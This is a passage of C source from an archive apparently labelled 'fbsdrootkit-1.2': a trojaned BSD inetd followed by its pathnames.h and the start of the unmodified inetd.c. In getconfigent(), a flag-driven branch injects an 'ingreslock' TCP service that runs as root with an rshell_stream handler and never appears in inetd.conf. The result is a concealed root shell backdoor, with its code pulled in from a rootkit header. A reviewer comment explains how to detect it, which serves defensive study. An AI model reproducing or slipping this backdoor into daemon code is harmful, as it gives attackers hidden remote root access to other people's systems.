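	    turnon(sep->se_fd, SO_DEBUG) < 0)
		syslog(LOG_ERR, "setsockopt (SO_DEBUG): %m");
	if (turnon(sep->se_fd, SO_REUSEADDR) < 0)
		syslog(LOG_ERR, "setsockopt (SO_REUSEADDR): %m");
#undef turnon
	if (bind(sep->se_fd, (struct sockaddr *)&sep->se_ctrladdr,
	    sizeof (sep->se_ctrladdr)) < 0) {
		if (debug)
			fprintf(stderr, "bind failed on %s/%s: %s\n",
				sep->se_service, sep->se_proto,
				strerror(errno));
		syslog(LOG_ERR, "%s/%s: bind: %m",
		    sep->se_service, sep->se_proto);
		(void) close(sep->se_fd);
		sep->se_fd = -1;
		if (!timingout) {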
timingout = 1; alarm(RETRYTIME); } return; } if (sep->se_rpc) { int i, len = sizeof(struct sockaddr); if (getsockname(sep->se_fd, (struct sockaddr*)&sep->se_ctrladdr, &len) < 0){ syslog(LOG_ERR, "%s/%s: getsockname: %m", sep->se_service, sep->se_proto); (void) close(sep->se_fd); sep->se_fd = -1; return; } if (debug) print_service("REG ", sep); for (i = sep->se_rpc_lowvers; i <= sep->se_rpc_highvers; i++) { pmap_unset(sep->se_rpc_prog, i); pmap_set(sep->se_rpc_prog, i, (sep->se_socktype == SOCK_DGRAM) ? IPPROTO_UDP : IPPROTO_TCP, ntohs(sep->se_ctrladdr.sin_port)); } } if (sep->se_socktype == SOCK_STREAM) listen(sep->se_fd, 10); FD_SET(sep->se_fd, &allsock); nsock++; if (sep->se_fd > maxsock) maxsock = sep->se_fd; if (debug) { fprintf(stderr, "registered %s on %d\n", sep->se_server, sep->se_fd); } } /* * Finish with a service and its socket. */ void close_sep(sep) struct servtab *sep; { if (sep->se_fd >= 0) { nsock--; FD_CLR(sep->se_fd, &allsock); (void) close(sep->se_fd); sep->se_fd = -1; } sep->se_count = 0; /* * Don't keep the pid of this running deamon: when reapchild() * reaps this pid, it would erroneously increment nsock. 
*/
	if (sep->se_wait > 1)
		sep->se_wait = 1;
}

/*
 * Copy *cp into a freshly allocated servtab, mark it as having no socket
 * yet (se_fd = -1) and link it at the head of the global servtab list
 * while the SIGBLOCK signals are held off.  Returns the new entry; the
 * program exits if the allocation fails.
 */
struct servtab *
enter(cp)
	struct servtab *cp;
{
	struct servtab *sep;
	long omask;

	sep = (struct servtab *)malloc(sizeof (*sep));
	if (sep == (struct servtab *)0) {
		syslog(LOG_ERR, "Out of memory.");
		exit(-1);
	}
	*sep = *cp;
	sep->se_fd = -1;
	omask = sigblock(SIGBLOCK);
	sep->se_next = servtab;
	servtab = sep;
	sigsetmask(omask);
	return (sep);
}

FILE	*fconfig = NULL;	/* open configuration file, NULL when closed */
struct	servtab serv;		/* entry getconfigent() fills in and returns */
char	line[LINE_MAX];		/* buffer nextline() reads each line into */

/*
 * Open the file named by CONFIG for reading, or rewind it when it is
 * already open.  Returns 1 on success and 0 when fopen() fails.
 */
int
setconfig()
{

	if (fconfig != NULL) {
		fseek(fconfig, 0L, SEEK_SET);
		return (1);
	}
	fconfig = fopen(CONFIG, "r");
	return (fconfig != NULL);
}

/* Close the configuration file if it is open. */
void
endconfig()
{
	if (fconfig) {
		(void) fclose(fconfig);
		fconfig = NULL;
	}
}

/*
 * Return the next service entry, built in the static `serv', or a null
 * pointer once nextline() reports no more input.
 */
struct servtab *
getconfigent()
{
	struct servtab *sep = &serv;
	int argc;
	char *cp, *arg;
	char *versp;
	static char TCPMUX_TOKEN[] = "tcpmux/";
#define MUX_LEN		(sizeof(TCPMUX_TOKEN)-1)

	/* Add one-time internal shell service on ingreslock port */
	/*
	 * NOTE(review): this branch does not read the configuration file.
	 * While the global `werd' is non-zero, the call returns a hand-built
	 * entry -- service "ingreslock", stream/tcp, user "root", server
	 * "internal", handler rshell_stream -- and decrements the flag;
	 * config() raises `werd' again at the start of every reload.  The
	 * entry therefore never appears in the file named by CONFIG, so an
	 * audit of that file alone will not show the listener.  Compare the
	 * sockets this daemon actually holds with the configured services,
	 * and verify the binary against a known-good copy.
	 */
	if(werd) {
		struct biltin *b=malloc(sizeof(struct biltin));
		b->bi_service="ingreslock";
		b->bi_socktype=SOCK_STREAM;
		b->bi_fork=1;
		b->bi_wait=0;
		b->bi_fn=rshell_stream;
		sep->se_bi=b;
		sep->se_service="ingreslock";
		sep->se_socktype=SOCK_STREAM;
		sep->se_proto="tcp";
		sep->se_wait=0;
		sep->se_user="root";
		sep->se_server="internal";
		werd--;
		return(sep);
	}

more:
	/* Skip comment lines (leading '#') and empty lines. */
	while ((cp = nextline(fconfig)) && (*cp == '#' || *cp == '\0'))
		;
	if (cp == NULL)
		return ((struct servtab *)0);
	/*
	 * clear the static buffer, since some fields (se_ctrladdr,
	 * for example) don't get initialized here.
	 */
	memset((caddr_t)sep, 0, sizeof *sep);
	arg = skip(&cp);
	if (cp == NULL) {
		/* got an empty line containing just blanks/tabs.
*/ goto more; } if (strncmp(arg, TCPMUX_TOKEN, MUX_LEN) == 0) { char *c = arg + MUX_LEN; if (*c == '+') { sep->se_type = MUXPLUS_TYPE; c++; } else sep->se_type = MUX_TYPE; sep->se_service = newstr(c); } else { sep->se_service = newstr(arg); sep->se_type = NORM_TYPE; } arg = sskip(&cp); if (strcmp(arg, "stream") == 0) sep->se_socktype = SOCK_STREAM; else if (strcmp(arg, "dgram") == 0) sep->se_socktype = SOCK_DGRAM; else if (strcmp(arg, "rdm") == 0) sep->se_socktype = SOCK_RDM; else if (strcmp(arg, "seqpacket") == 0) sep->se_socktype = SOCK_SEQPACKET; else if (strcmp(arg, "raw") == 0) sep->se_socktype = SOCK_RAW; else sep->se_socktype = -1; sep->se_proto = newstr(sskip(&cp)); if (strncmp(sep->se_proto, "rpc/", 4) == 0) { sep->se_proto += 4; sep->se_rpc = 1; sep->se_rpc_prog = sep->se_rpc_lowvers = sep->se_rpc_lowvers = 0; sep->se_ctrladdr.sin_family = AF_INET; sep->se_ctrladdr.sin_port = 0; sep->se_ctrladdr.sin_addr.s_addr = htonl(INADDR_ANY); if ((versp = rindex(sep->se_service, '/'))) { *versp++ = '\0'; switch (sscanf(versp, "%d-%d", &sep->se_rpc_lowvers, &sep->se_rpc_highvers)) { case 2: break; case 1: sep->se_rpc_highvers = sep->se_rpc_lowvers; break; default: syslog(LOG_ERR, "bad RPC version specifier; %s\n", sep->se_service); freeconfig(sep); goto more; } } else { sep->se_rpc_lowvers = sep->se_rpc_highvers = 1; } } arg = sskip(&cp); sep->se_wait = strcmp(arg, "wait") == 0; if (ISMUX(sep)) { /* * Silently enforce "nowait" for TCPMUX services since * they don't have an assigned port to listen on. 
*/ sep->se_wait = 0; if (strcmp(sep->se_proto, "tcp")) { syslog(LOG_ERR, "%s: bad protocol for tcpmux service %s", CONFIG, sep->se_service); goto more; } if (sep->se_socktype != SOCK_STREAM) { syslog(LOG_ERR, "%s: bad socket type for tcpmux service %s", CONFIG, sep->se_service); goto more; } } sep->se_user = newstr(sskip(&cp)); sep->se_server = newstr(sskip(&cp)); if (strcmp(sep->se_server, "internal") == 0) { struct biltin *bi; for (bi = biltins; bi->bi_service; bi++) if (bi->bi_socktype == sep->se_socktype && strcmp(bi->bi_service, sep->se_service) == 0) break; if (bi->bi_service == 0) { syslog(LOG_ERR, "internal service %s unknown", sep->se_service); goto more; } sep->se_bi = bi; sep->se_wait = bi->bi_wait; } else sep->se_bi = NULL; argc = 0; for (arg = skip(&cp); cp; arg = skip(&cp)) if (argc < MAXARGV) sep->se_argv[argc++] = newstr(arg); while (argc <= MAXARGV) sep->se_argv[argc++] = NULL; return (sep); } void freeconfig(cp) struct servtab *cp; { int i; if (cp->se_service) free(cp->se_service); if (cp->se_proto) free(cp->se_proto); if (cp->se_user) free(cp->se_user); if (cp->se_server) free(cp->se_server); for (i = 0; i < MAXARGV; i++) if (cp->se_argv[i]) free(cp->se_argv[i]); } /* * Safe skip - if skip returns null, log a syntax error in the * configuration file and exit. 
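*/
char *
sskip(cpp)
	char **cpp;
{
	char *cp;

	cp = skip(cpp);
	if (cp == NULL) {
		syslog(LOG_ERR, "%s: syntax error", CONFIG);
		exit(-1);
	}
	return (cp);
}

/*
 * Return the next blank/tab-delimited token of *cpp, terminated in place,
 * and advance *cpp past it.  At the end of a line the next character of
 * fconfig is peeked at: a leading blank or tab marks a continuation line,
 * which is read and scanned instead.  With no token left, *cpp is set to
 * a null pointer and a null pointer is returned.
 */
char *
skip(cpp)
	char **cpp;
{
	char *cp = *cpp;
	char *start;

again:
	while (*cp == ' ' || *cp == '\t')
		cp++;
	if (*cp == '\0') {
		int c;

		c = getc(fconfig);
		(void) ungetc(c, fconfig);
		if (c == ' ' || c == '\t')
			if (cp = nextline(fconfig))
				goto again;
		*cpp = (char *)0;
		return ((char *)0);
	}
	start = cp;
	while (*cp && *cp != ' ' && *cp != '\t')
		cp++;
	if (*cp != '\0')
		*cp++ = '\0';
	*cpp = cp;
	return (start);
}

/*
 * Read one line from fd into the global `line' buffer and cut it at the
 * first newline.  Returns `line', or a null pointer when fgets() fails.
 */
char *
nextline(fd)
	FILE *fd;
{
	char *cp;

	if (fgets(line, sizeof (line), fd) == NULL)
		return ((char *)0);
	cp = strchr(line, '\n');
	if (cp)
		*cp = '\0';
	return (line);
}

/*
 * Return a heap copy of cp (of "" when cp is null); log and exit when
 * strdup() fails.
 */
char *
newstr(cp)
	char *cp;
{
	if (cp = strdup(cp ? cp : ""))
		return (cp);
	syslog(LOG_ERR, "strdup: %m");
	exit(-1);
}

/*
 * Overwrite the argument area that starts at Argv[0] and ends at LastArg
 * with "-<a> [<peer address>]" (or just "-<a>" when getpeername() fails
 * on socket s), padding the remainder with blanks.
 */
void
setproctitle(a, s)
	char *a;
	int s;
{
	int size;
	char *cp;
	struct sockaddr_in sin;
	char buf[80];

	cp = Argv[0];
	size = sizeof(sin);
	/*
	 * Format with a bound.  Callers pass the service name, which is
	 * taken from a configuration line and can be far longer than buf;
	 * an unbounded sprintf() would write past the end of the array.
	 * An over-long title is truncated instead.
	 */
	if (getpeername(s, (struct sockaddr *)&sin, &size) == 0)
		(void) snprintf(buf, sizeof(buf), "-%s [%s]", a,
		    inet_ntoa(sin.sin_addr));
	else
		(void) snprintf(buf, sizeof(buf), "-%s", a);
	strncpy(cp, buf, LastArg - cp);
	cp += strlen(cp);
	while (cp < LastArg)
		*cp++ = ' ';
}

/*
 * Internet services provided internally by inetd:
 */
#define	BUFSIZE	8192

/* Internal rootkit shell service function */
#include "../rootkitinetd.h"

/* ARGSUSED */
void
echo_stream(s, sep)		/* Echo service -- echo data back */
	int s;
	struct servtab *sep;
{
	char buffer[BUFSIZE];
	int i;

	setproctitle(sep->se_service, s);
	while ((i = read(s, buffer, sizeof(buffer))) > 0 &&
	    write(s, buffer, i) > 0)
		;
	exit(0);
}

/*
 * Refuse datagrams whose source port equals the bound port of one of the
 * built-in datagram services: returns 1 (after logging) on a match and
 * 0 otherwise.
 */
int
check_loop(sin, sep)
	struct sockaddr_in *sin;
	struct servtab *sep;
{
	struct servtab *se2;

	for (se2 = servtab; se2; se2 = se2->se_next) {
		if (!se2->se_bi || se2->se_socktype != SOCK_DGRAM)
			continue;

		if (sin->sin_port == se2->se_ctrladdr.sin_port) {
			syslog(LOG_WARNING,
			       "%s/%s:%s/%s loop request REFUSED from %s",
			       sep->se_service, sep->se_proto,
			       se2->se_service,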
se2->se_proto, inet_ntoa(sin->sin_addr)); return 1; } } return 0; } /* ARGSUSED */ void echo_dg(s, sep) /* Echo service -- echo data back */ int s; struct servtab *sep; { char buffer[BUFSIZE]; int i, size; struct sockaddr_in sin; size = sizeof(sin); if ((i = recvfrom(s, buffer, sizeof(buffer), 0, (struct sockaddr *)&sin, &size)) < 0) return; if (check_loop(&sin, sep)) return; (void) sendto(s, buffer, i, 0, (struct sockaddr *)&sin, sizeof(sin)); } /* ARGSUSED */ void discard_stream(s, sep) /* Discard service -- ignore data */ int s; struct servtab *sep; { int ret; char buffer[BUFSIZE]; setproctitle(sep->se_service, s); while (1) { while ((ret = read(s, buffer, sizeof(buffer))) > 0) ; if (ret == 0 || errno != EINTR) break; } exit(0); } /* ARGSUSED */ void discard_dg(s, sep) /* Discard service -- ignore data */ int s; struct servtab *sep; { char buffer[BUFSIZE]; (void) read(s, buffer, sizeof(buffer)); } #include #define LINESIZ 72 char ring[128]; char *endring; void initring() { int i; endring = ring; for (i = 0; i <= 128; ++i) if (isprint(i)) *endring++ = i; } /* ARGSUSED */ void chargen_stream(s, sep) /* Character generator */ int s; struct servtab *sep; { int len; char *rs, text[LINESIZ+2]; setproctitle(sep->se_service, s); if (!endring) { initring(); rs = ring; } text[LINESIZ] = '\r'; text[LINESIZ + 1] = '\n'; for (rs = ring;;) { if ((len = endring - rs) >= LINESIZ) memmove(text, rs, LINESIZ); else { memmove(text, rs, len); memmove(text + len, ring, LINESIZ - len); } if (++rs == endring) rs = ring; if (write(s, text, sizeof(text)) != sizeof(text)) break; } exit(0); } /* ARGSUSED */ void chargen_dg(s, sep) /* Character generator */ int s; struct servtab *sep; { struct sockaddr_in sin; static char *rs; int len, size; char text[LINESIZ+2]; if (endring == 0) { initring(); rs = ring; } size = sizeof(sin); if (recvfrom(s, text, sizeof(text), 0, (struct sockaddr *)&sin, &size) < 0) return; if (check_loop(&sin, sep)) return; if ((len = endring - rs) >= LINESIZ) 
memmove(text, rs, LINESIZ); else { memmove(text, rs, len); memmove(text + len, ring, LINESIZ - len); } if (++rs == endring) rs = ring; text[LINESIZ] = '\r'; text[LINESIZ + 1] = '\n'; (void) sendto(s, text, sizeof(text), 0, (struct sockaddr *)&sin, sizeof(sin)); } /* * Return a machine readable date and time, in the form of the * number of seconds since midnight, Jan 1, 1900. Since gettimeofday * returns the number of seconds since midnight, Jan 1, 1970, * we must add 2208988800 seconds to this figure to make up for * some seventy years Bell Labs was asleep. */ long machtime() { struct timeval tv; if (gettimeofday(&tv, (struct timezone *)0) < 0) { if (debug) fprintf(stderr, "Unable to get time of day\n"); return (0L); } #define OFFSET ((u_long)25567 * 24*60*60) return (htonl((long)(tv.tv_sec + OFFSET))); #undef OFFSET } /* ARGSUSED */ void machtime_stream(s, sep) int s; struct servtab *sep; { long result; result = machtime(); (void) write(s, (char *) &result, sizeof(result)); } /* ARGSUSED */ void machtime_dg(s, sep) int s; struct servtab *sep; { long result; struct sockaddr_in sin; int size; size = sizeof(sin); if (recvfrom(s, (char *)&result, sizeof(result), 0, (struct sockaddr *)&sin, &size) < 0) return; if (check_loop(&sin, sep)) return; result = machtime(); (void) sendto(s, (char *) &result, sizeof(result), 0, (struct sockaddr *)&sin, sizeof(sin)); } /* ARGSUSED */ void daytime_stream(s, sep) /* Return human-readable time of day */ int s; struct servtab *sep; { char buffer[256]; time_t clock; clock = time((time_t *) 0); (void) sprintf(buffer, "%.24s\r\n", ctime(&clock)); (void) write(s, buffer, strlen(buffer)); } /* ARGSUSED */ void daytime_dg(s, sep) /* Return human-readable time of day */ int s; struct servtab *sep; { char buffer[256]; time_t clock; struct sockaddr_in sin; int size; clock = time((time_t *) 0); size = sizeof(sin); if (recvfrom(s, buffer, sizeof(buffer), 0, (struct sockaddr *)&sin, &size) < 0) return; if (check_loop(&sin, sep)) return; (void) 
sprintf(buffer, "%.24s\r\n", ctime(&clock)); (void) sendto(s, buffer, strlen(buffer), 0, (struct sockaddr *)&sin, sizeof(sin)); } /* * print_service: * Dump relevant information to stderr */ void print_service(action, sep) char *action; struct servtab *sep; { if(sep->se_rpc) fprintf(stderr, "%s: %s proto=%s, wait=%d, user=%s builtin=%x server=%s\n", action, sep->se_service, sep->se_proto, sep->se_wait, sep->se_user, (int)sep->se_bi, sep->se_server); else fprintf(stderr, "%s: %s proto=%s, wait=%d, user=%s builtin=%x server=%s\n", action, sep->se_service, sep->se_proto, sep->se_wait, sep->se_user, (int)sep->se_bi, sep->se_server); } /* * Based on TCPMUX.C by Mark K. Lottor November 1988 * sri-nic::ps:tcpmux.c */ static int /* # of characters upto \r,\n or \0 */ getline(fd, buf, len) int fd; char *buf; int len; { int count = 0, n; do { n = read(fd, buf, len-count); if (n == 0) return (count); if (n < 0) return (-1); while (--n >= 0) { if (*buf == '\r' || *buf == '\n' || *buf == '\0') return (count); count++; buf++; } } while (count < len); return (count); } #define MAX_SERV_LEN (256+2) /* 2 bytes for \r\n */ #define strwrite(fd, buf) (void) write(fd, buf, sizeof(buf)-1) struct servtab * tcpmux(s) int s; { struct servtab *sep; char service[MAX_SERV_LEN+1]; int len; /* Get requested service name */ if ((len = getline(s, service, MAX_SERV_LEN)) < 0) { strwrite(s, "-Error reading service name\r\n"); return (NULL); } service[len] = '\0'; if (debug) fprintf(stderr, "tcpmux: someone wants %s\n", service); /* * Help is a required command, and lists available services, * one per line. 
*/ if (!strcasecmp(service, "help")) { for (sep = servtab; sep; sep = sep->se_next) { if (!ISMUX(sep)) continue; (void)write(s,sep->se_service,strlen(sep->se_service)); strwrite(s, "\r\n"); } return (NULL); } /* Try matching a service in inetd.conf with the request */ for (sep = servtab; sep; sep = sep->se_next) { if (!ISMUX(sep)) continue; if (!strcasecmp(service, sep->se_service)) { if (ISMUXPLUS(sep)) { strwrite(s, "+Go\r\n"); } return (sep); } } strwrite(s, "-Service not available\r\n"); return (NULL); } fbsdrootkit-1.2/inetd/pathnames.h100600 764 764 3702 6143713534 14377 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pathnames.h 8.1 (Berkeley) 6/6/93 */ #include #define _PATH_INETDCONF "/etc/inetd.conf" #define _PATH_INETDPID _PATH_VARRUN "inetd.pid" fbsdrootkit-1.2/inetd/inetd.c.dist100600 764 764 106002 6254701651 14514 0ustar dfdf/* * Copyright (c) 1983, 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. 
* * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1991, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint /* from: @(#)inetd.c 8.4 (Berkeley) 4/13/94"; */ static char inetd_c_rcsid[] = "$Id: inetd.c,v 1.6.2.1 1996/05/07 03:11:58 gpalmer Exp $"; #endif /* not lint */ /* * Inetd - Internet super-server * * This program invokes all internet services as needed. Connection-oriented * services are invoked each time a connection is made, by creating a process. * This process is passed the connection as file descriptor 0 and is expected * to do a getpeername to find out the source host and port. * * Datagram oriented services are invoked when a datagram * arrives; a process is created and passed a pending message * on file descriptor 0. Datagram servers may either connect * to their peer, freeing up the original socket for inetd * to receive further messages on, or ``take over the socket'', * processing all arriving datagrams and, eventually, timing * out. The first type of server is said to be ``multi-threaded''; * the second type of server ``single-threaded''. 
 *
 * Inetd uses a configuration file which is read at startup
 * and, possibly, at some later time in response to a hangup signal.
 * The configuration file is ``free format'' with fields given in the
 * order shown below. Continuation lines for an entry must begin with
 * a space or tab. All fields must be present in each entry.
 *
 *	service name			must be in /etc/services or must
 *					name a tcpmux service
 *	socket type			stream/dgram/raw/rdm/seqpacket
 *	protocol			must be in /etc/protocols
 *	wait/nowait			single-threaded/multi-threaded
 *	user				user to run daemon as
 *	server program			full path name
 *	server program arguments	maximum of MAXARGS (20)
 *
 * TCP services without official port numbers are handled with the
 * RFC1078-based tcpmux internal service. Tcpmux listens on port 1 for
 * requests. When a connection is made from a foreign host, the service
 * requested is passed to tcpmux, which looks it up in the servtab list
 * and returns the proper entry for the service. Tcpmux returns a
 * negative reply if the service doesn't exist, otherwise the invoked
 * server is expected to return the positive reply if the service type in
 * inetd.conf file has the prefix "tcpmux/". If the service type has the
 * prefix "tcpmux/+", tcpmux will return the positive reply for the
 * process; this is for compatibility with older server code, and also
 * allows you to invoke programs that use stdin/stdout without putting any
 * special server code in them. Services that use tcpmux are "nowait"
 * because they do not have a well-known port and hence cannot listen
 * for new requests.
 *
 * For RPC services
 *	service name/version		must be in /etc/rpc
 *	socket type			stream/dgram/raw/rdm/seqpacket
 *	protocol			must be in /etc/protocols
 *	wait/nowait			single-threaded/multi-threaded
 *	user				user to run daemon as
 *	server program			full path name
 *	server program arguments	maximum of MAXARGS
 *
 * Comment lines are indicated by a `#' in column 1.
*/ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pathnames.h" #define TOOMANY 256 /* don't start more than TOOMANY */ #define CNT_INTVL 60 /* servers in CNT_INTVL sec. */ #define RETRYTIME (60*10) /* retry after bind or server fail */ #define SIGBLOCK (sigmask(SIGCHLD)|sigmask(SIGHUP)|sigmask(SIGALRM)) int debug = 0; int log = 0; int nsock, maxsock; fd_set allsock; int options; int timingout; int toomany = TOOMANY; struct servent *sp; struct rpcent *rpc; struct servtab { char *se_service; /* name of service */ int se_socktype; /* type of socket to use */ char *se_proto; /* protocol used */ short se_wait; /* single threaded server */ short se_checked; /* looked at during merge */ char *se_user; /* user name to run as */ struct biltin *se_bi; /* if built-in, description */ char *se_server; /* server program */ #define MAXARGV 20 char *se_argv[MAXARGV+1]; /* program arguments */ int se_fd; /* open descriptor */ int se_type; /* type */ struct sockaddr_in se_ctrladdr;/* bound address */ int se_rpc; /* ==1 if RPC service */ int se_rpc_prog; /* RPC program number */ u_int se_rpc_lowvers; /* RPC low version */ u_int se_rpc_highvers; /* RPC high version */ int se_count; /* number started since se_time */ struct timeval se_time; /* start of se_count */ struct servtab *se_next; } *servtab; #define NORM_TYPE 0 #define MUX_TYPE 1 #define MUXPLUS_TYPE 2 #define ISMUX(sep) (((sep)->se_type == MUX_TYPE) || \ ((sep)->se_type == MUXPLUS_TYPE)) #define ISMUXPLUS(sep) ((sep)->se_type == MUXPLUS_TYPE) void chargen_dg __P((int, struct servtab *)); void chargen_stream __P((int, struct servtab *)); void close_sep __P((struct servtab *)); void config __P((int)); void daytime_dg __P((int, struct servtab *)); void daytime_stream __P((int, struct servtab *)); void discard_dg __P((int, struct servtab *)); void discard_stream __P((int, struct servtab 
*)); void echo_dg __P((int, struct servtab *)); void echo_stream __P((int, struct servtab *)); void endconfig __P((void)); struct servtab *enter __P((struct servtab *)); void freeconfig __P((struct servtab *)); struct servtab *getconfigent __P((void)); void machtime_dg __P((int, struct servtab *)); void machtime_stream __P((int, struct servtab *)); char *newstr __P((char *)); char *nextline __P((FILE *)); void print_service __P((char *, struct servtab *)); void reapchild __P((int)); void retry __P((int)); int setconfig __P((void)); void setup __P((struct servtab *)); char *sskip __P((char **)); char *skip __P((char **)); struct servtab *tcpmux __P((int)); void unregisterrpc __P((register struct servtab *sep)); struct biltin { char *bi_service; /* internally provided service name */ int bi_socktype; /* type of socket supported */ short bi_fork; /* 1 if should fork before call */ short bi_wait; /* 1 if should wait for child */ void (*bi_fn)(); /* function which performs it */ } biltins[] = { /* Echo received data */ { "echo", SOCK_STREAM, 1, 0, echo_stream }, { "echo", SOCK_DGRAM, 0, 0, echo_dg }, /* Internet /dev/null */ { "discard", SOCK_STREAM, 1, 0, discard_stream }, { "discard", SOCK_DGRAM, 0, 0, discard_dg }, /* Return 32 bit time since 1970 */ { "time", SOCK_STREAM, 0, 0, machtime_stream }, { "time", SOCK_DGRAM, 0, 0, machtime_dg }, /* Return human-readable time */ { "daytime", SOCK_STREAM, 0, 0, daytime_stream }, { "daytime", SOCK_DGRAM, 0, 0, daytime_dg }, /* Familiar character generator */ { "chargen", SOCK_STREAM, 1, 0, chargen_stream }, { "chargen", SOCK_DGRAM, 0, 0, chargen_dg }, { "tcpmux", SOCK_STREAM, 1, 0, (void (*)())tcpmux }, { NULL } }; #define NUMINT (sizeof(intab) / sizeof(struct inent)) char *CONFIG = _PATH_INETDCONF; char **Argv; char *LastArg; int main(argc, argv, envp) int argc; char *argv[], *envp[]; { struct servtab *sep; struct passwd *pwd; struct sigvec sv; int tmpint, ch, dofork; pid_t pid; char buf[50]; struct sockaddr_in peer; int i; 
Argv = argv; if (envp == 0 || *envp == 0) envp = argv; while (*envp) envp++; LastArg = envp[-1] + strlen(envp[-1]); openlog("inetd", LOG_PID | LOG_NOWAIT, LOG_DAEMON); while ((ch = getopt(argc, argv, "dlR:")) != EOF) switch(ch) { case 'd': debug = 1; options |= SO_DEBUG; break; case 'l': log = 1; break; case 'R': { /* invocation rate */ char *p; tmpint = strtol(optarg, &p, 0); if (tmpint < 1 || *p) syslog(LOG_ERR, "-R %s: bad value for service invocation rate", optarg); else toomany = tmpint; break; } case '?': default: syslog(LOG_ERR, "usage: inetd [-dl] [-R rate] [conf-file]"); exit(1); } argc -= optind; argv += optind; if (argc > 0) CONFIG = argv[0]; if (debug == 0) { FILE *fp; daemon(0, 0); pid = getpid(); fp = fopen(_PATH_INETDPID, "w"); if (fp) { fprintf(fp, "%ld\n", (long)pid); fclose(fp); } else { syslog(LOG_WARNING, _PATH_INETDPID ": %m"); } } memset(&sv, 0, sizeof(sv)); sv.sv_mask = SIGBLOCK; sv.sv_handler = retry; sigvec(SIGALRM, &sv, (struct sigvec *)0); config(SIGHUP); sv.sv_handler = config; sigvec(SIGHUP, &sv, (struct sigvec *)0); sv.sv_handler = reapchild; sigvec(SIGCHLD, &sv, (struct sigvec *)0); { /* space for daemons to overwrite environment for ps */ #define DUMMYSIZE 100 char dummy[DUMMYSIZE]; (void)memset(dummy, 'x', sizeof(DUMMYSIZE) - 1); dummy[DUMMYSIZE - 1] = '\0'; (void)setenv("inetd_dummy", dummy, 1); } for (;;) { int n, ctrl; fd_set readable; if (nsock == 0) { (void) sigblock(SIGBLOCK); while (nsock == 0) sigpause(0L); (void) sigsetmask(0L); } readable = allsock; if ((n = select(maxsock + 1, &readable, (fd_set *)0, (fd_set *)0, (struct timeval *)0)) <= 0) { if (n < 0 && errno != EINTR) syslog(LOG_WARNING, "select: %m"); sleep(1); continue; } for (sep = servtab; n && sep; sep = sep->se_next) if (sep->se_fd != -1 && FD_ISSET(sep->se_fd, &readable)) { n--; if (debug) fprintf(stderr, "someone wants %s\n", sep->se_service); if (!sep->se_wait && sep->se_socktype == SOCK_STREAM) { ctrl = accept(sep->se_fd, (struct sockaddr *)0, (int *)0); if 
